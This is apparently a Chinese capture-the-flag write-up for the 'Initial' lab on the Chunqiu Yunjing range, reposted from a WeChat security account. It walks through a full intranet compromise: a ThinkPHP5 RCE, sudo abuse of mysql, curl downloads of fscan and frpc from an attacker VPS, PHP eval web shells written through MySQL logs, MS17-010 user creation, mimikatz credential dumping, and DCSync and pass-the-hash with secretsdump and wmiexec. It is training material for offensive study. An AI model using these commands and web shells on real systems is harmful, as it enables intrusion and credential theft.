春秋云镜-Initial-WriteUp

WriteUp 3个月前 admin
24 0 0

:声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关


      现在只对常读和星标的公众号才展示大图推送,建议大家把猫蛋儿安全“设为星标”,否则可能看不到了!


春秋云镜-Initial-WriteUp



春秋云镜-Initial-WriteUp

靶场简介

       Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。

春秋云镜-Initial-WriteUp

春秋云镜-Initial-WriteUp



春秋云镜-Initial-WriteUp

获取入口机权限

通过fscan对目标ip进行扫描

./fscan_darwin -h 39.98.209.209

春秋云镜-Initial-WriteUp

发现存在tp5 rce,通过工具成功一键利用

春秋云镜-Initial-WriteUp

通过sudo提权获得flag01:flag{60b53231-

sudo -lsudo /usr/bin/mysql -e '! cat /root/flag/flag01.txt'
春秋云镜-Initial-WriteUp
春秋云镜-Initial-WriteUp



春秋云镜-Initial-WriteUp

内网横向

使用fscan对当前c段进行扫描

curl http://39.98.170.21:8001/fscan_amd64 --output fscanchmod +x ./fscan./fscan -h 172.22.2.1/24
172.22.1.18:3306 open172.22.1.18:445 open172.22.1.21:445 open172.22.1.2:445 open172.22.1.18:139 open172.22.1.21:139 open172.22.1.2:139 open172.22.1.18:135 open172.22.1.21:135 open172.22.1.15:22 open172.22.1.2:135 open172.22.1.18:80 open172.22.1.2:88 open172.22.1.15:80 open[*]172.22.1.2   [->]DC01   [->]172.22.1.2[+] 172.22.1.21    MS17-010    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)[*] NetInfo:[*]172.22.1.18   [->]XIAORANG-OA01   [->]172.22.1.18[*] NetInfo:[*]172.22.1.21   [->]XIAORANG-WIN7   [->]172.22.1.21[*] WebTitle: http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin[*] 172.22.1.2  (Windows Server 2016 Datacenter 14393)[*] NetBios: 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600 [*] NetBios: 172.22.1.2      [+]DC DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393 [*] NetBios: 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1 [*] WebTitle: http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

frp内网穿透,进入目标内网

curl http://vpsip:8001/frpc --output frpccurl http://vpsip:8001/frpc.ini --output frpc.ininohup ./frpc -c frpc.ini

通过前面探测发现http://172.22.1.18为信呼OA,通过路径扫描发现存在phpmyadmin接口

春秋云镜-Initial-WriteUp

该OA存在历史漏洞:https://blog.csdn.net/solitudi/article/details/118675321,只需要在该脚本同目录下创建一个php一句话木马即可:<?php eval($_GET["1"]);?>;

对phpadmin经过尝试发现可以通过root/root进行登录,这时候可以通过mysql日志写马的方式来getshell;

show variables like 'general%';查看是否开启日志以及存放的日志位置
春秋云镜-Initial-WriteUp

开启日志并写入一句话木马

set global general_log = ON;开启日志set global general_log_file = "c:/phpStudy/PHPTutorial/www/1.php"select '<?php eval($_POST[shell]);?>'

通过蚁剑进行连接

春秋云镜-Initial-WriteUp

在C:/Users/Administrator/flag/flag02.txt获得flag02

flag02:2ce3-4813-87d4-

春秋云镜-Initial-WriteUp

172.22.1.21存在17010,通过利用工具添加用户test:test@123!,并将test用户添加到本地管理员组当中。

后续通过test用户rdp到用户桌面,使用mimikatz抓取lsass凭证,获取XIAORANG-WIN7$的hash

XIAORANG-WIN7$/d4df8a3fa73a9fee14a62123784290c6

随后通过bloodhound分析后发现XIAORANG-WIN7$对域内拥有dcsync权限

春秋云镜-Initial-WriteUp

通过XIAORANG-WIN7$的凭证进行dcsync

python3 secretsdump.py [email protected] -just-dc-user administrator -hashes :d4df8a3fa73a9fee14a62123784290c6
春秋云镜-Initial-WriteUp

利用administrator的凭证对dc进行远程连接

python3 wmiexec.py xiaorang/[email protected] -hashes :10cf89a850fb1cdbe6bb432b859164c8
春秋云镜-Initial-WriteUp

在dc上获取flag03:e8f88d0d43d6}

整个flag:flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

春秋云镜-Initial-WriteUp



春秋云镜-Initial-WriteUp

关于我们


持续从基础到深入的更新攻防文章

点击下方名片进入公众号,欢迎关注!

春秋云镜-Initial-WriteUp

点个小赞你最好看



原文始发于微信公众号(猫蛋儿安全):春秋云镜-Initial-WriteUp

版权声明:admin 发表于 2023年12月1日 上午9:03。
转载请注明:春秋云镜-Initial-WriteUp | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...